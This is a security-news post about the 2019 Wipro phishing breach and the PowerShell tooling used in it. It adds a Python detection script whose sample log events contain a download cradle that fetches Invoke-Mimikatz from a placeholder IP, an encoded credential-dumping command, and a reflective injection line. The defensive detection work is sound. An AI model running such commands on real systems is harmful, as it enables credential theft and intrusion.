Hackers Are Using PowerShell Modules and Hacking Tools for Remote Access & Post-Exploitation to Hack Wipro

Jun 04, 2019
Posted by
Cyber Security

Wipro, one of India's largest and best-known IT services companies, suffered a security breach earlier this month after its employees were targeted by a sophisticated phishing campaign. The attackers used the ScreenConnect remote access tool, Powerkatz, and PowerSploit in the campaign.

ScreenConnect is a legitimate remote access tool normally used for desktop support and remote meetings. Powerkatz is a PowerShell port of Mimikatz, the post-exploitation tool that searches process memory for credentials. PowerSploit is a collection of PowerShell modules built for penetration-testing engagements; in the wrong hands, all three give an intruder remote control and credential access without dropping a conventional executable.
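The tools described above leave characteristic traces in PowerShell script block logging (Event ID 4104) and process-creation command lines. As an added example (not code from this article or from Flashpoint's report), the following Python triages constructed log records for PowerSploit exports, Mimikatz module syntax, download cradles, and hidden or encoded invocations. It decodes `-EncodedCommand` payloads (UTF-16LE base64) before matching, so a wrapped `Invoke-Mimikatz` call is still caught even though the raw command line shows none of the cleartext indicators. The sample records, hostnames and IP addresses are constructed; the PowerSploit function names and Mimikatz module strings are real.

```python
"""Triage PowerShell telemetry for PowerSploit / Mimikatz-style tooling.

Added example, not from the article or Flashpoint's report. The events below
are constructed to resemble PowerShell script block logging (Event ID 4104)
and process-creation command lines; they are not real Wipro telemetry.
"""
import base64
import re
from typing import Dict, List, Optional

# Indicator names and patterns. The function names are real PowerSploit
# exports and the "module::command" strings are real Mimikatz syntax.
INDICATORS = [
    ("powersploit_export", re.compile(
        r"\b(Invoke-Mimikatz|Invoke-ReflectivePEInjection|Invoke-Shellcode|"
        r"Get-Keystrokes|Invoke-DllInjection)\b", re.I)),
    ("mimikatz_module", re.compile(
        r"sekurlsa::|lsadump::|kerberos::|privilege::debug", re.I)),
    ("download_cradle", re.compile(
        r"(IEX|Invoke-Expression)[^\n]*(DownloadString|DownloadFile|Net\.WebClient)", re.I)),
    # Both flags anywhere on the line, in any order.
    ("hidden_noprofile", re.compile(
        r"(?=.*-(nop|noprofile)\b)(?=.*-w(indowstyle)?\s+hidden)", re.I)),
    ("encoded_command", re.compile(
        r"-(EncodedCommand|enc|ec|e)\s+[A-Za-z0-9+/=]{16,}", re.I)),
]

# -EncodedCommand and its documented short forms, followed by a base64 blob.
ENCODED_ARG = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def encode_ps(command: str) -> str:
    """Encode a command the way powershell.exe -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


def decode_encoded_command(text: str) -> Optional[str]:
    """Return the decoded payload of an -EncodedCommand argument, or None.

    Malformed base64 or non-UTF-16 bytes count as "not decodable" rather than
    raising, so one bad record never aborts the whole triage run.
    """
    m = ENCODED_ARG.search(text)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event: Dict) -> List[str]:
    """Return the sorted indicator names that fire on one event.

    The decoded -EncodedCommand payload, when present, is scanned alongside
    the raw text, so base64 wrapping does not hide the tooling.
    """
    texts = [event["text"]]
    decoded = decode_encoded_command(event["text"])
    if decoded is not None:
        texts.append(decoded)
    hits = {name for name, pattern in INDICATORS
            if any(pattern.search(t) for t in texts)}
    return sorted(hits)


def triage(events: List[Dict]) -> Dict[int, List[str]]:
    """Map event id -> indicator names, keeping only events with at least one hit."""
    result = {}
    for ev in events:
        hits = score_event(ev)
        if hits:
            result[ev["id"]] = hits
    return result


# Constructed sample telemetry (hostnames and addresses are placeholders).
SAMPLE_EVENTS = [
    {"id": 1, "host": "ws01",
     "text": "Get-ChildItem C:\\Users | Measure-Object"},
    {"id": 2, "host": "ws02",
     "text": "IEX (New-Object Net.WebClient).DownloadString("
             "'http://198.51.100.7/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"},
    {"id": 3, "host": "ws03",
     "text": "powershell.exe -nop -w hidden -EncodedCommand "
             + encode_ps("Invoke-Mimikatz -Command '\"sekurlsa::logonpasswords\"'")},
    {"id": 4, "host": "ws04",
     "text": "Import-Module .\\PowerSploit.psd1; Invoke-ReflectivePEInjection -PEBytes $bytes"},
]

if __name__ == "__main__":
    for event_id, hits in triage(SAMPLE_EVENTS).items():
        print(event_id, hits)
```

Event 1 (ordinary directory listing) produces no hits; event 2 fires on the download cradle and the PowerSploit export; event 3 shows why decoding matters, since only `hidden_noprofile` and `encoded_command` are visible in the raw command line while the Mimikatz call and its `sekurlsa::` module appear after decoding. The patterns are deliberately narrow string matches; in production they belong alongside AMSI and script block logging, not in place of them, because the original script text is what these rules need to see.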

The attackers behind the phishing campaigns are also reported to have compromised more than 100 computer systems, and to have targeted Infosys and Cognizant as well.

Flashpoint determined that phishing domains were the primary attack vector. Its researchers analysed a half-dozen malicious domains hosting templates consistent with credential phishing: the pages lured victims into entering their Windows usernames and passwords, ostensibly in order to access encrypted email.

Flashpoint's Reaves and Platt told Threatpost that the event underscores the security implications of third-party relationships.

The investigation also turned up another piece of malware, Imminent Monitor, a remote administration tool distributed through a Word document. The document contained a URL that redirected to a file hosted at flexmail[.]tv, a domain that appears to have been used repeatedly to deliver documents and payloads in other campaigns.

The attackers' ultimate aim appears to be access to the portals that companies across multiple industries use to manage gift card and rewards programs.

Wipro is not the only target. According to Krebs, Cognizant, Infosys, Rackspace, Capgemini, and Slalom have all detected phishing activity with patterns similar to those seen at Wipro.

A Wipro spokesperson said that the company had become aware of potentially abnormal activity on its network related to a very few employee accounts, and that these accounts had been subjected to very advanced phishing activity.

Flashpoint assesses with confidence that the threat actors are linked to a 2017 phishing campaign. Its researchers tied the actors to other malicious activity dating back to 2017, and possibly to 2015, and noted the re-use of infrastructure from those older attacks. Last month the campaign targeted a number of Wipro employee accounts.